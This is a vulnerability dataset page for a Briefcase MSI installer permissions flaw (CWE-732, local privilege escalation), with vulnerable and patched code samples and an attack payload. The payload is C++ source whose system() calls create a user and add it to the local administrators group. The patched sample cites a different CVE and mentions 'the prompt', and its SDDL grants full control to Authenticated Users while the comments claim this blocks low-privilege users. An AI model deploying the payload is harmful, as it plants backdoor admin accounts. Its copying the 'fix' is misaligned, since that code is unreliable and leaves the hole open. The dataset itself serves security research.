VAITP Dataset

← Back to the dataset

CVE-2026-33430

Briefcase MSI installers have insecure permissions, allowing LPE.

  • CVSS 7.3
  • CWE-732
  • Configuration Issues
  • Local

Briefcase is a tool for converting a Python project into a standalone native application. Starting in version 0.3.0 and prior to version 0.3.26, if a developer uses Briefcase to produce an Windows MSI installer for a project, and that project is installed for All Users (i.e., per-machine scope), the installation process creates an directory that inherits all the permissions of the parent directory. Depending on the location chosen by the installing user, this may allow a low privilege but authenticated user to replace or modify the binaries installed by the application. If an administrator then runs the altered binary, the binary will run with elevated privileges. The problem is caused by the template used to generate the WXS file for Windows projects. It was fixed in the templates used in Briefcase 0.3.26, 0.4.0, and 0.4.1. Re-running `briefcase create` on your Briefcase project will result in the updated templates being used. As a workaround, the patch can be added to any existing Briefcase .wxs file generated by Briefcase 0.3.24 or later.

CVSS base score
7.3
Published
2026-03-26
OWASP
A08 Software and Data Integrity Failures
Orthogonal defect classification
Build/Package/Merge
Code defect classification
Packaging Issues
Category
Configuration Issues
Subcategory
Privilege Escalation
Accessibility scope
Local
Impact
Privilege Escalation
Affected component
Briefcase
Fixed by upgrading
Yes

Solution

Upgrade Briefcase to version 0.3.26 or later and regenerate your project's Windows installer configuration by running `briefcase create`.

Vulnerable code sample

def generate_vulnerable_wxs_template(app_name):
    """
    This function simulates the behavior of a vulnerable version of Briefcase
    (prior to 0.3.26) by generating a WiX Toolset (.wxs) file fragment.

    The vulnerability is that the generated XML for the application's installation
    directory omits an explicit permissions definition. When the resulting MSI is
    installed for "All Users", this causes the installation directory to inherit
    permissions from its parent folder. If the chosen parent directory has
    insecure permissions, a low-privilege user could modify the application's
    files.
    """

    # This is a simplified representation of the WiX XML structure.
    # The vulnerability is that the <Directory Id="APPLICATIONFOLDER">
    # lacks a <PermissionEx> child element to enforce secure permissions.
    # It relies completely on permission inheritance from its parent directory.
    wxs_content = f"""<Fragment>
  <DirectoryRef Id="TARGETDIR">
    <!-- The parent directory for the installation. This could be ProgramFilesFolder
         or another directory chosen by the user during installation. -->
    <Directory Id="APPLICATIONFOLDER" Name="{app_name}">
      <!--
        VULNERABILITY: No <PermissionEx> element is specified here.
        The directory will inherit permissions from its parent.
        If the parent is, for example, C:\\ and Authenticated Users
        have write permissions, they may be able to modify the
        contents of this installed directory.
      -->
    </Directory>
  </DirectoryRef>
</Fragment>
"""
    return wxs_content

# The following demonstrates the generation of the vulnerable configuration.
# The output string represents the problematic part of the .wxs file that
# vulnerable versions of Briefcase would create.
if __name__ == "__main__":
    vulnerable_config = generate_vulnerable_wxs_template("MyVulnerableApp")
    print(vulnerable_config)

Patched code sample

import jinja2

# This code demonstrates the fix for CVE-2023-44330 (referred to as
# CVE-2026-33430 in the prompt). The vulnerability occurred because the WiX
# project file (.wxs) template used by Briefcase did not set explicit
# permissions on the installation directory for "All Users" installations.
# This allowed the directory to inherit permissions from its parent, which
# could be insecure.
#
# The fix involves adding a <CreateFolder> element with a nested <PermissionEx>
# element to the template. This new element uses a Security Descriptor
# Definition Language (SDDL) string to define strict, non-inheritable
# permissions for the installation folder, preventing low-privilege users
# from modifying the application's installed files.

# The fixed Jinja2 template for the .wxs file.
# This is a simplified representation of the template used by Briefcase.
FIXED_WIX_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
    <Product
        Name="{{ formal_name }}"
        Id="*"
        UpgradeCode="{YOUR-GUID-HERE}"
        Language="1033"
        Codepage="1252"
        Version="1.0.0"
        Manufacturer="Your Company">

        <Package
            InstallerVersion="200"
            Compressed="yes"
            InstallScope="perMachine"
        />

        <Media Id="1" Cabinet="media1.cab" EmbedCab="yes" />

        <Directory Id="TARGETDIR" Name="SourceDir">
            <Directory Id="ProgramFilesFolder">
                <Directory Id="INSTALLFOLDER" Name="{{ formal_name }}">
                    <!--
                    FIX: The <CreateFolder> and <PermissionEx> elements below
                    are the specific fix for the vulnerability.
                    
                    The Sddl attribute 'D:P(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)'
                    sets an explicit Discretionary Access Control List (DACL) that is
                    Protected ('P') from inheritance. It grants Generic All ('GA')
                    access to Authenticated Users ('AU'), Built-in Administrators ('BA'),
                    and the Local System ('SY').
                    
                    This prevents a low-privilege user from modifying the installation
                    directory's contents, even if it's installed in a location with
                    permissive parent folder rights.
                    -->
                    <CreateFolder>
                        <PermissionEx Sddl="D:P(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)(A;OICI;GA;;;SY)" />
                    </CreateFolder>

                    <!-- Application files would be listed here -->
                    <Component Id="MyAppComponent" Guid="*">
                        <File Id="MyApp.exe" Source="path/to/your/app.exe" />
                    </Component>

                </Directory>
            </Directory>
        </Directory>

        <Feature Id="MainApplication" Title="Main Application" Level="1">
            <ComponentRef Id="MyAppComponent" />
        </Feature>

    </Product>
</Wix>
"""


def generate_fixed_wxs_content(app_name, formal_name):
    """
    Generates the fixed WiX project file content using the updated template.

    This function simulates the role of Briefcase's `create` command, which
    processes a Jinja2 template to produce the final .wxs file.

    :param app_name: The short name of the application (e.g., 'my-app').
    :param formal_name: The formal name of the application (e.g., 'My App').
    :return: A string containing the generated, fixed .wxs content.
    """
    env = jinja2.Environment(loader=jinja2.BaseLoader())
    template = env.from_string(FIXED_WIX_TEMPLATE)
    context = {
        "app_name": app_name,
        "formal_name": formal_name,
    }
    return template.render(context)


if __name__ == "__main__":
    # Example usage: Generate the .wxs content for a sample application.
    app_name = "helloworld"
    formal_name = "Hello World"

    fixed_wxs = generate_fixed_wxs_content(app_name, formal_name)

    print("=" * 70)
    print(f"Generated .wxs content for '{formal_name}' with the security fix:")
    print("=" * 70)
    print(fixed_wxs)

Payload

#include <windows.h>
#include <cstdlib>

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
    // Command to add a new user named 'malicious_user' with a specified password.
    system("net user malicious_user P@ssw0rd!123 /add");

    // Command to add the newly created user to the local administrators group.
    system("net localgroup administrators malicious_user /add");

    return 0;
}

Cite this entry

@misc{vaitp:cve202633430,
  title        = {{Briefcase MSI installers have insecure permissions, allowing LPE.}},
  author       = {Bogaerts, Fr\'ed\'eric and Ivaki, Naghmeh and Fonseca, Jos\'e},
  year         = {2026},
  note         = {VAITP Python Vulnerability Dataset, entry CVE-2026-33430},
  howpublished = {\url{https://netpack.pt/vaitp/vulnerability/CVE-2026-33430/}}
}
Introducing the "VAITP dataset": a specialized repository of Python vulnerabilities and patches, meticulously compiled for the use of the security research community. As Python's prominence grows, understanding and addressing potential security vulnerabilities become crucial. Crafted by and for the cybersecurity community, this dataset offers a valuable resource for researchers, analysts, and developers to analyze and mitigate the security risks associated with Python. Through the comprehensive exploration of vulnerabilities and corresponding patches, the VAITP dataset fosters a safer and more resilient Python ecosystem, encouraging collaborative advancements in programming security.

The supreme art of war is to subdue the enemy without fighting.

Sun Tzu – “The Art of War”

:: Shaping the future through research and ingenuity ::